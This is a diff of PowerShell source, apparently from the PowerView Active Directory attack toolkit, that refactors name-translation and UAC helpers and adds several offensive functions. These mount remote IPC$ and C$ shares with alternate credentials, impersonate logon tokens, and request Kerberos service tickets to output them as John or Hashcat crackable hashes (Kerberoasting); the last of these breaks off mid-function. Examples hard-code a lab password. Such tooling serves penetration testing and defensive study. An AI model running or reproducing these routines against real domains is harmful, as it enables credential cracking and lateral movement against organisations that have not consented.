+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+ [OutputType([String])]
[CmdletBinding()]
- param(
- [Parameter(Mandatory=$True, ValueFromPipeline=$True)]
+ Param(
+ [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('Name', 'ObjectName')]
+ [String[]]
+ $Identity,
+
[String]
- $ObjectName,
+ [ValidateSet('DN', 'Canonical', 'NT4', 'Display', 'DomainSimple', 'EnterpriseSimple', 'GUID', 'Unknown', 'UPN', 'CanonicalEx', 'SPN')]
+ $OutputType,
+ [ValidateNotNullOrEmpty()]
[String]
- [ValidateSet("NT4","Simple","Canonical")]
- $InputType,
+ $Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
[String]
- [ValidateSet("NT4","Simple","Canonical")]
- $OutputType
+ $Server,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- $NameTypes = @{
- 'Canonical' = 2
- 'NT4' = 3
- 'Simple' = 5
- }
+ BEGIN {
+ $NameTypes = @{
+ 'DN' = 1 # CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com
+ 'Canonical' = 2 # fabrikam.com/Engineers/Phineas Flynn
+ 'NT4' = 3 # fabrikam\pflynn
+ 'Display' = 4 # pflynn
+ 'DomainSimple' = 5 # pflynn@fabrikam.com
+ 'EnterpriseSimple' = 6 # pflynn@fabrikam.com
+ 'GUID' = 7 # {95ee9fff-3436-11d1-b2b0-d15ae3ac8436}
+ 'Unknown' = 8 # unknown type - let the server do translation
+ 'UPN' = 9 # pflynn@fabrikam.com
+ 'CanonicalEx' = 10 # fabrikam.com/Users/Phineas Flynn
+ 'SPN' = 11 # HTTP/kairomac.contoso.com
+ 'SID' = 12 # S-1-5-21-12986231-600641547-709122288-57999
+ }
- if(-not $PSBoundParameters['InputType']) {
- if( ($ObjectName.split('/')).Count -eq 2 ) {
- $ObjectName = $ObjectName.replace('/', '\')
+ # accessor functions from Bill Stewart to simplify calls to NameTranslate
+ function Invoke-Method([__ComObject] $Object, [String] $Method, $Parameters) {
+ $Output = $Null
+ $Output = $Object.GetType().InvokeMember($Method, 'InvokeMethod', $NULL, $Object, $Parameters)
+ Write-Output $Output
}
- if($ObjectName -match "^[A-Za-z]+\\[A-Za-z ]+") {
- $InputType = 'NT4'
+ function Get-Property([__ComObject] $Object, [String] $Property) {
+ $Object.GetType().InvokeMember($Property, 'GetProperty', $NULL, $Object, $NULL)
}
- elseif($ObjectName -match "^[A-Za-z ]+@[A-Za-z\.]+") {
- $InputType = 'Simple'
+
+ function Set-Property([__ComObject] $Object, [String] $Property, $Parameters) {
+ [Void] $Object.GetType().InvokeMember($Property, 'SetProperty', $NULL, $Object, $Parameters)
}
- elseif($ObjectName -match "^[A-Za-z\.]+/[A-Za-z]+/[A-Za-z/ ]+") {
- $InputType = 'Canonical'
+
+ # https://msdn.microsoft.com/en-us/library/aa772266%28v=vs.85%29.aspx
+ if ($PSBoundParameters['Server']) {
+ $ADSInitType = 2
+ $InitName = $Server
}
- else {
- Write-Warning "Can not identify InType for $ObjectName"
- return $ObjectName
+ elseif ($PSBoundParameters['Domain']) {
+ $ADSInitType = 1
+ $InitName = $Domain
}
- }
- elseif($InputType -eq 'NT4') {
- $ObjectName = $ObjectName.replace('/', '\')
- }
-
- if(-not $PSBoundParameters['OutputType']) {
- $OutputType = Switch($InputType) {
- 'NT4' {'Canonical'}
- 'Simple' {'NT4'}
- 'Canonical' {'NT4'}
+ elseif ($PSBoundParameters['Credential']) {
+ $Cred = $Credential.GetNetworkCredential()
+ $ADSInitType = 1
+ $InitName = $Cred.Domain
+ }
+ else {
+ # if no domain or server is specified, default to GC initialization
+ $ADSInitType = 3
+ $InitName = $Null
}
}
- # try to extract the domain from the given format
- $Domain = Switch($InputType) {
- 'NT4' { $ObjectName.split("\")[0] }
- 'Simple' { $ObjectName.split("@")[1] }
- 'Canonical' { $ObjectName.split("/")[0] }
- }
-
- # Accessor functions to simplify calls to NameTranslate
- function Invoke-Method([__ComObject] $Object, [String] $Method, $Parameters) {
- $Output = $Object.GetType().InvokeMember($Method, "InvokeMethod", $Null, $Object, $Parameters)
- if ( $Output ) { $Output }
- }
- function Set-Property([__ComObject] $Object, [String] $Property, $Parameters) {
- [Void] $Object.GetType().InvokeMember($Property, "SetProperty", $Null, $Object, $Parameters)
- }
+ PROCESS {
+ ForEach ($TargetIdentity in $Identity) {
+ if (-not $PSBoundParameters['OutputType']) {
+ if ($TargetIdentity -match "^[A-Za-z]+\\[A-Za-z ]+") {
+ $ADSOutputType = $NameTypes['DomainSimple']
+ }
+ else {
+ $ADSOutputType = $NameTypes['NT4']
+ }
+ }
+ else {
+ $ADSOutputType = $NameTypes[$OutputType]
+ }
- $Translate = New-Object -ComObject NameTranslate
+ $Translate = New-Object -ComObject NameTranslate
- try {
- Invoke-Method $Translate "Init" (1, $Domain)
- }
- catch [System.Management.Automation.MethodInvocationException] {
- Write-Verbose "Error with translate init in Convert-ADName: $_"
- }
+ if ($PSBoundParameters['Credential']) {
+ try {
+ $Cred = $Credential.GetNetworkCredential()
+
+ Invoke-Method $Translate 'InitEx' (
+ $ADSInitType,
+ $InitName,
+ $Cred.UserName,
+ $Cred.Domain,
+ $Cred.Password
+ )
+ }
+ catch {
+ Write-Verbose "[Convert-ADName] Error initializing translation for '$Identity' using alternate credentials : $_"
+ }
+ }
+ else {
+ try {
+ $Null = Invoke-Method $Translate 'Init' (
+ $ADSInitType,
+ $InitName
+ )
+ }
+ catch {
+ Write-Verbose "[Convert-ADName] Error initializing translation for '$Identity' : $_"
+ }
+ }
- Set-Property $Translate "ChaseReferral" (0x60)
+ # always chase all referrals
+ Set-Property $Translate 'ChaseReferral' (0x60)
- try {
- Invoke-Method $Translate "Set" ($NameTypes[$InputType], $ObjectName)
- (Invoke-Method $Translate "Get" ($NameTypes[$OutputType]))
- }
- catch [System.Management.Automation.MethodInvocationException] {
- Write-Verbose "Error with translate Set/Get in Convert-ADName: $_"
+ try {
+ # 8 = Unknown name type -> let the server do the work for us
+ $Null = Invoke-Method $Translate 'Set' (8, $TargetIdentity)
+ Invoke-Method $Translate 'Get' ($ADSOutputType)
+ }
+ catch [System.Management.Automation.MethodInvocationException] {
+ Write-Verbose "[Convert-ADName] Error translating '$TargetIdentity' : $($_.Exception.InnerException.Message)"
+ }
+ }
}
}
function ConvertFrom-UACValue {
<#
- .SYNOPSIS
+.SYNOPSIS
- Converts a UAC int value to human readable form.
+Converts a UAC int value to human readable form.
- .PARAMETER Value
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
- The int UAC value to convert.
+.DESCRIPTION
- .PARAMETER ShowAll
+This function will take an integer that represents a User Account
+Control (UAC) binary blob and will covert it to an ordered
+dictionary with each bitwise value broken out. By default only values
+set are displayed- the -ShowAll switch will display all values with
+a + next to the ones set.
- Show all UAC values, with a + indicating the value is currently set.
+.PARAMETER Value
- .EXAMPLE
+Specifies the integer UAC value to convert.
- PS C:\> ConvertFrom-UACValue -Value 66176
+.PARAMETER ShowAll
- Convert the UAC value 66176 to human readable format.
+Switch. Signals ConvertFrom-UACValue to display all UAC values, with a + indicating the value is currently set.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Get-NetUser jason | select useraccountcontrol | ConvertFrom-UACValue
+ConvertFrom-UACValue -Value 66176
- Convert the UAC value for 'jason' to human readable format.
+Name Value
+---- -----
+ENCRYPTED_TEXT_PWD_ALLOWED 128
+NORMAL_ACCOUNT 512
+DONT_EXPIRE_PASSWORD 65536
- .EXAMPLE
+.EXAMPLE
- PS C:\> Get-NetUser jason | select useraccountcontrol | ConvertFrom-UACValue -ShowAll
+Get-DomainUser harmj0y | ConvertFrom-UACValue
- Convert the UAC value for 'jason' to human readable format, showing all
- possible UAC values.
+Name Value
+---- -----
+NORMAL_ACCOUNT 512
+DONT_EXPIRE_PASSWORD 65536
+
+.EXAMPLE
+
+Get-DomainUser harmj0y | ConvertFrom-UACValue -ShowAll
+
+Name Value
+---- -----
+SCRIPT 1
+ACCOUNTDISABLE 2
+HOMEDIR_REQUIRED 8
+LOCKOUT 16
+PASSWD_NOTREQD 32
+PASSWD_CANT_CHANGE 64
+ENCRYPTED_TEXT_PWD_ALLOWED 128
+TEMP_DUPLICATE_ACCOUNT 256
+NORMAL_ACCOUNT 512+
+INTERDOMAIN_TRUST_ACCOUNT 2048
+WORKSTATION_TRUST_ACCOUNT 4096
+SERVER_TRUST_ACCOUNT 8192
+DONT_EXPIRE_PASSWORD 65536+
+MNS_LOGON_ACCOUNT 131072
+SMARTCARD_REQUIRED 262144
+TRUSTED_FOR_DELEGATION 524288
+NOT_DELEGATED 1048576
+USE_DES_KEY_ONLY 2097152
+DONT_REQ_PREAUTH 4194304
+PASSWORD_EXPIRED 8388608
+TRUSTED_TO_AUTH_FOR_DELEGATION 16777216
+PARTIAL_SECRETS_ACCOUNT 67108864
+
+.INPUTS
+
+Int
+
+Accepts an integer representing a UAC binary blob.
+
+.OUTPUTS
+
+System.Collections.Specialized.OrderedDictionary
+
+An ordered dictionary with the converted UAC fields.
+
+.LINK
+
+https://support.microsoft.com/en-us/kb/305144
#>
-
+
+ [OutputType('System.Collections.Specialized.OrderedDictionary')]
[CmdletBinding()]
- param(
- [Parameter(Mandatory=$True, ValueFromPipeline=$True)]
+ Param(
+ [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('UAC', 'useraccountcontrol')]
+ [Int]
$Value,
[Switch]
$ShowAll
)
- begin {
+ BEGIN {
# values from https://support.microsoft.com/en-us/kb/305144
$UACValues = New-Object System.Collections.Specialized.OrderedDictionary
$UACValues.Add("SCRIPT", 1)
@@ -1214,26 +2120,12 @@ function ConvertFrom-UACValue {
$UACValues.Add("PARTIAL_SECRETS_ACCOUNT", 67108864)
}
- process {
-
+ PROCESS {
$ResultUACValues = New-Object System.Collections.Specialized.OrderedDictionary
- if($Value -is [Int]) {
- $IntValue = $Value
- }
- elseif ($Value -is [PSCustomObject]) {
- if($Value.useraccountcontrol) {
- $IntValue = $Value.useraccountcontrol
- }
- }
- else {
- Write-Warning "Invalid object input for -Value : $Value"
- return $Null
- }
-
- if($ShowAll) {
- foreach ($UACValue in $UACValues.GetEnumerator()) {
- if( ($IntValue -band $UACValue.Value) -eq $UACValue.Value) {
+ if ($ShowAll) {
+ ForEach ($UACValue in $UACValues.GetEnumerator()) {
+ if ( ($Value -band $UACValue.Value) -eq $UACValue.Value) {
$ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)+")
}
else {
@@ -1242,8 +2134,8 @@ function ConvertFrom-UACValue {
}
}
else {
- foreach ($UACValue in $UACValues.GetEnumerator()) {
- if( ($IntValue -band $UACValue.Value) -eq $UACValue.Value) {
+ ForEach ($UACValue in $UACValues.GetEnumerator()) {
+ if ( ($Value -band $UACValue.Value) -eq $UACValue.Value) {
$ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)")
}
}
@@ -1253,221 +2145,909 @@ function ConvertFrom-UACValue {
}
-filter Get-Proxy {
+function Get-PrincipalContext {
<#
- .SYNOPSIS
-
- Enumerates the proxy server and WPAD conents for the current user.
+.SYNOPSIS
+
+Helper to take an Identity and return a DirectoryServices.AccountManagement.PrincipalContext
+and simplified identity.
- .PARAMETER ComputerName
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
- The computername to enumerate proxy settings on, defaults to local host.
+.PARAMETER Identity
- .EXAMPLE
+A group SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202),
+or a DOMAIN\username identity.
- PS C:\> Get-Proxy
-
- Returns the current proxy settings.
+.PARAMETER Domain
+
+Specifies the domain to use to search for user/group principals, defaults to the current domain.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
#>
- param(
- [Parameter(ValueFromPipeline=$True)]
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, Mandatory = $True)]
+ [Alias('GroupName', 'GroupIdentity')]
+ [String]
+ $Identity,
+
[ValidateNotNullOrEmpty()]
[String]
- $ComputerName = $ENV:COMPUTERNAME
+ $Domain,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
+ Add-Type -AssemblyName System.DirectoryServices.AccountManagement
+
try {
- $Reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('CurrentUser', $ComputerName)
- $RegKey = $Reg.OpenSubkey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings")
- $ProxyServer = $RegKey.GetValue('ProxyServer')
- $AutoConfigURL = $RegKey.GetValue('AutoConfigURL')
+ if ($PSBoundParameters['Domain'] -or ($Identity -match '.+\\.+')) {
+ if ($Identity -match '.+\\.+') {
+ # DOMAIN\groupname
+ $ConvertedIdentity = $Identity | Convert-ADName -OutputType Canonical
+ if ($ConvertedIdentity) {
+ $ConnectTarget = $ConvertedIdentity.SubString(0, $ConvertedIdentity.IndexOf('/'))
+ $ObjectIdentity = $Identity.Split('\')[1]
+ Write-Verbose "[Get-PrincipalContext] Binding to domain '$ConnectTarget'"
+ }
+ }
+ else {
+ $ObjectIdentity = $Identity
+ Write-Verbose "[Get-PrincipalContext] Binding to domain '$Domain'"
+ $ConnectTarget = $Domain
+ }
- $Wpad = ""
- if($AutoConfigURL -and ($AutoConfigURL -ne "")) {
- try {
- $Wpad = (New-Object Net.Webclient).DownloadString($AutoConfigURL)
+ if ($PSBoundParameters['Credential']) {
+ Write-Verbose '[Get-PrincipalContext] Using alternate credentials'
+ $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $ConnectTarget, $Credential.UserName, $Credential.GetNetworkCredential().Password)
}
- catch {
- Write-Warning "Error connecting to AutoConfigURL : $AutoConfigURL"
+ else {
+ $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $ConnectTarget)
+ }
+ }
+ else {
+ if ($PSBoundParameters['Credential']) {
+ Write-Verbose '[Get-PrincipalContext] Using alternate credentials'
+ $DomainName = Get-Domain | Select-Object -ExpandProperty Name
+ $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $DomainName, $Credential.UserName, $Credential.GetNetworkCredential().Password)
+ }
+ else {
+ $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain)
}
+ $ObjectIdentity = $Identity
}
-
- if($ProxyServer -or $AutoConfigUrl) {
- $Properties = @{
- 'ProxyServer' = $ProxyServer
- 'AutoConfigURL' = $AutoConfigURL
- 'Wpad' = $Wpad
+ $Out = New-Object PSObject
+ $Out | Add-Member Noteproperty 'Context' $Context
+ $Out | Add-Member Noteproperty 'Identity' $ObjectIdentity
+ $Out
+ }
+ catch {
+ Write-Warning "[Get-PrincipalContext] Error creating binding for object ('$Identity') context : $_"
+ }
+}
+
+
+function Add-RemoteConnection {
+<#
+.SYNOPSIS
+
+Pseudo "mounts" a connection to a remote path using the specified
+credential object, allowing for access of remote resources. If a -Path isn't
+specified, a -ComputerName is required to pseudo-mount IPC$.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+.DESCRIPTION
+
+This function uses WNetAddConnection2W to make a 'temporary' (i.e. not saved) connection
+to the specified remote -Path (\\UNC\share) with the alternate credentials specified in the
+-Credential object. If a -Path isn't specified, a -ComputerName is required to pseudo-mount IPC$.
+
+To destroy the connection, use Remove-RemoteConnection with the same specified \\UNC\share path
+or -ComputerName.
+
+.PARAMETER ComputerName
+
+Specifies the system to add a \\ComputerName\IPC$ connection for.
+
+.PARAMETER Path
+
+Specifies the remote \\UNC\path to add the connection for.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system.
+
+.EXAMPLE
+
+$Cred = Get-Credential
+Add-RemoteConnection -ComputerName 'PRIMARY.testlab.local' -Credential $Cred
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Add-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\' -Credential $Cred
+
+.EXAMPLE
+
+$Cred = Get-Credential
+@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Add-RemoteConnection -Credential $Cred
+#>
+
+ [CmdletBinding(DefaultParameterSetName = 'ComputerName')]
+ Param(
+ [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ComputerName', ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('HostName', 'dnshostname', 'name')]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $ComputerName,
+
+ [Parameter(Position = 0, ParameterSetName = 'Path', Mandatory = $True)]
+ [ValidatePattern('\\\\.*\\.*')]
+ [String[]]
+ $Path,
+
+ [Parameter(Mandatory = $True)]
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential
+ )
+
+ BEGIN {
+ $NetResourceInstance = [Activator]::CreateInstance($NETRESOURCEW)
+ $NetResourceInstance.dwType = 1
+ }
+
+ PROCESS {
+ $Paths = @()
+ if ($PSBoundParameters['ComputerName']) {
+ ForEach ($TargetComputerName in $ComputerName) {
+ $TargetComputerName = $TargetComputerName.Trim('\')
+ $Paths += ,"\\$TargetComputerName\IPC$"
}
-
- New-Object -TypeName PSObject -Property $Properties
}
else {
- Write-Warning "No proxy settings found for $ComputerName"
+ $Paths += ,$Path
+ }
+
+ ForEach ($TargetPath in $Paths) {
+ $NetResourceInstance.lpRemoteName = $TargetPath
+ Write-Verbose "[Add-RemoteConnection] Attempting to mount: $TargetPath"
+
+ # https://msdn.microsoft.com/en-us/library/windows/desktop/aa385413(v=vs.85).aspx
+ # CONNECT_TEMPORARY = 4
+ $Result = $Mpr::WNetAddConnection2W($NetResourceInstance, $Credential.GetNetworkCredential().Password, $Credential.UserName, 4)
+
+ if ($Result -eq 0) {
+ Write-Verbose "$TargetPath successfully mounted"
+ }
+ else {
+ Throw "[Add-RemoteConnection] error mounting $TargetPath : $(([ComponentModel.Win32Exception]$Result).Message)"
+ }
}
}
- catch {
- Write-Warning "Error enumerating proxy settings for $ComputerName : $_"
+}
+
+
+function Remove-RemoteConnection {
+<#
+.SYNOPSIS
+
+Destroys a connection created by New-RemoteConnection.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+.DESCRIPTION
+
+This function uses WNetCancelConnection2 to destroy a connection created by
+New-RemoteConnection. If a -Path isn't specified, a -ComputerName is required to
+'unmount' \\$ComputerName\IPC$.
+
+.PARAMETER ComputerName
+
+Specifies the system to remove a \\ComputerName\IPC$ connection for.
+
+.PARAMETER Path
+
+Specifies the remote \\UNC\path to remove the connection for.
+
+.EXAMPLE
+
+Remove-RemoteConnection -ComputerName 'PRIMARY.testlab.local'
+
+.EXAMPLE
+
+Remove-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\'
+
+.EXAMPLE
+
+@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Remove-RemoteConnection
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+ [CmdletBinding(DefaultParameterSetName = 'ComputerName')]
+ Param(
+ [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ComputerName', ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('HostName', 'dnshostname', 'name')]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $ComputerName,
+
+ [Parameter(Position = 0, ParameterSetName = 'Path', Mandatory = $True)]
+ [ValidatePattern('\\\\.*\\.*')]
+ [String[]]
+ $Path
+ )
+
+ PROCESS {
+ $Paths = @()
+ if ($PSBoundParameters['ComputerName']) {
+ ForEach ($TargetComputerName in $ComputerName) {
+ $TargetComputerName = $TargetComputerName.Trim('\')
+ $Paths += ,"\\$TargetComputerName\IPC$"
+ }
+ }
+ else {
+ $Paths += ,$Path
+ }
+
+ ForEach ($TargetPath in $Paths) {
+ Write-Verbose "[Remove-RemoteConnection] Attempting to unmount: $TargetPath"
+ $Result = $Mpr::WNetCancelConnection2($TargetPath, 0, $True)
+
+ if ($Result -eq 0) {
+ Write-Verbose "$TargetPath successfully ummounted"
+ }
+ else {
+ Throw "[Remove-RemoteConnection] error unmounting $TargetPath : $(([ComponentModel.Win32Exception]$Result).Message)"
+ }
+ }
}
}
-function Request-SPNTicket {
+function Invoke-UserImpersonation {
<#
- .SYNOPSIS
-
- Request the kerberos ticket for a specified service principal name (SPN).
-
- .PARAMETER SPN
+.SYNOPSIS
- The service principal name to request the ticket for. Required.
-
- .PARAMETER EncPart
-
- Switch. Return the encrypted portion of the ticket (cipher).
+Creates a new "runas /netonly" type logon and impersonates the token.
- .EXAMPLE
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
- PS C:\> Request-SPNTicket -SPN "HTTP/web.testlab.local"
-
- Request a kerberos service ticket for the specified SPN.
-
- .EXAMPLE
+.DESCRIPTION
- PS C:\> Request-SPNTicket -SPN "HTTP/web.testlab.local" -EncPart
-
- Request a kerberos service ticket for the specified SPN and return the encrypted portion of the ticket.
+This function uses LogonUser() with the LOGON32_LOGON_NEW_CREDENTIALS LogonType
+to simulate "runas /netonly". The resulting token is then impersonated with
+ImpersonateLoggedOnUser() and the token handle is returned for later usage
+with Invoke-RevertToSelf.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object with alternate credentials
+to impersonate in the current thread space.
+
+.PARAMETER TokenHandle
+
+An IntPtr TokenHandle returned by a previous Invoke-UserImpersonation.
+If this is supplied, LogonUser() is skipped and only ImpersonateLoggedOnUser()
+is executed.
+
+.PARAMETER Quiet
+
+Suppress any warnings about STA vs MTA.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Invoke-UserImpersonation -Credential $Cred
+
+.OUTPUTS
+
+IntPtr
+
+The TokenHandle result from LogonUser.
+#>
+
+ [OutputType([IntPtr])]
+ [CmdletBinding(DefaultParameterSetName = 'Credential')]
+ Param(
+ [Parameter(Mandatory = $True, ParameterSetName = 'Credential')]
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential,
+
+ [Parameter(Mandatory = $True, ParameterSetName = 'TokenHandle')]
+ [ValidateNotNull()]
+ [IntPtr]
+ $TokenHandle,
+
+ [Switch]
+ $Quiet
+ )
+
+ if (([System.Threading.Thread]::CurrentThread.GetApartmentState() -ne 'STA') -and (-not $PSBoundParameters['Quiet'])) {
+ Write-Warning "[Invoke-UserImpersonation] powershell.exe is not currently in a single-threaded apartment state, token impersonation may not work."
+ }
+
+ if ($PSBoundParameters['TokenHandle']) {
+ $LogonTokenHandle = $TokenHandle
+ }
+ else {
+ $LogonTokenHandle = [IntPtr]::Zero
+ $NetworkCredential = $Credential.GetNetworkCredential()
+ $UserDomain = $NetworkCredential.Domain
+ $UserName = $NetworkCredential.UserName
+ Write-Warning "[Invoke-UserImpersonation] Executing LogonUser() with user: $($UserDomain)\$($UserName)"
+
+ # LOGON32_LOGON_NEW_CREDENTIALS = 9, LOGON32_PROVIDER_WINNT50 = 3
+ # this is to simulate "runas.exe /netonly" functionality
+ $Result = $Advapi32::LogonUser($UserName, $UserDomain, $NetworkCredential.Password, 9, 3, [ref]$LogonTokenHandle);$LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error();
+
+ if (-not $Result) {
+ throw "[Invoke-UserImpersonation] LogonUser() Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
+ }
+ }
+
+ # actually impersonate the token from LogonUser()
+ $Result = $Advapi32::ImpersonateLoggedOnUser($LogonTokenHandle)
+
+ if (-not $Result) {
+ throw "[Invoke-UserImpersonation] ImpersonateLoggedOnUser() Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
+ }
+
+ Write-Verbose "[Invoke-UserImpersonation] Alternate credentials successfully impersonated"
+ $LogonTokenHandle
+}
+
+
+function Invoke-RevertToSelf {
+<#
+.SYNOPSIS
- .EXAMPLE
+Reverts any token impersonation.
- PS C:\> "HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Request-SPNTicket
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
- Request kerberos service tickets for all SPNs passed on the pipeline.
+.DESCRIPTION
- .EXAMPLE
+This function uses RevertToSelf() to revert any impersonated tokens.
+If -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation),
+CloseHandle() is used to close the opened handle.
- PS C:\> Get-NetUser -SPN | Request-SPNTicket
+.PARAMETER TokenHandle
- Request kerberos service tickets for all users with non-null SPNs.
+An optional IntPtr TokenHandle returned by Invoke-UserImpersonation.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$Token = Invoke-UserImpersonation -Credential $Cred
+Invoke-RevertToSelf -TokenHandle $Token
#>
[CmdletBinding()]
+ Param(
+ [ValidateNotNull()]
+ [IntPtr]
+ $TokenHandle
+ )
+
+ if ($PSBoundParameters['TokenHandle']) {
+ Write-Warning "[Invoke-RevertToSelf] Reverting token impersonation and closing LogonUser() token handle"
+ $Result = $Kernel32::CloseHandle($TokenHandle)
+ }
+
+ $Result = $Advapi32::RevertToSelf();$LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error();
+
+ if (-not $Result) {
+ throw "[Invoke-RevertToSelf] RevertToSelf() Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
+ }
+
+ Write-Verbose "[Invoke-RevertToSelf] Token impersonation successfully reverted"
+}
+
+
+function Get-DomainSPNTicket {
+<#
+.SYNOPSIS
+
+Request the kerberos ticket for a specified service principal name (SPN).
+
+Author: machosec, Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf
+
+.DESCRIPTION
+
+This function will either take one/more SPN strings, or one/more PowerView.User objects
+(the output from Get-DomainUser) and will request a kerberos ticket for the given SPN
+using System.IdentityModel.Tokens.KerberosRequestorSecurityToken. The encrypted
+portion of the ticket is then extracted and output in either crackable John or Hashcat
+format (deafult of John).
+
+.PARAMETER SPN
+
+Specifies the service principal name to request the ticket for.
+
+.PARAMETER User
+
+Specifies a PowerView.User object (result of Get-DomainUser) to request the ticket for.
+
+.PARAMETER OutputFormat
+
+Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.
+Defaults to 'John'.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote domain using Invoke-UserImpersonation.
+
+.EXAMPLE
+
+Get-DomainSPNTicket -SPN "HTTP/web.testlab.local"
+
+Request a kerberos service ticket for the specified SPN.
+
+.EXAMPLE
+
+"HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Get-DomainSPNTicket
+
+Request kerberos service tickets for all SPNs passed on the pipeline.
+
+.EXAMPLE
+
+Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat
+
+Request kerberos service tickets for all users with non-null SPNs and output in Hashcat format.
+
+.INPUTS
+
+String
+
+Accepts one or more SPN strings on the pipeline with the RawSPN parameter set.
+
+.INPUTS
+
+PowerView.User
+
+Accepts one or more PowerView.User objects on the pipeline with the User parameter set.
+
+.OUTPUTS
+
+PowerView.SPNTicket
+
+Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section.
+#>
+
+ [OutputType('PowerView.SPNTicket')]
+ [CmdletBinding(DefaultParameterSetName = 'RawSPN')]
Param (
- [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName = $True)]
+ [Parameter(Position = 0, ParameterSetName = 'RawSPN', Mandatory = $True, ValueFromPipeline = $True)]
+ [ValidatePattern('.*/.*')]
[Alias('ServicePrincipalName')]
[String[]]
$SPN,
-
- [Alias('EncryptedPart')]
- [Switch]
- $EncPart
+
+ [Parameter(Position = 0, ParameterSetName = 'User', Mandatory = $True, ValueFromPipeline = $True)]
+ [ValidateScript({ $_.PSObject.TypeNames[0] -eq 'PowerView.User' })]
+ [Object[]]
+ $User,
+
+ [ValidateSet('John', 'Hashcat')]
+ [Alias('Format')]
+ [String]
+ $OutputFormat = 'John',
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- begin {
- Add-Type -AssemblyName System.IdentityModel
+ BEGIN {
+ $Null = [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel')
+
+ if ($PSBoundParameters['Credential']) {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential
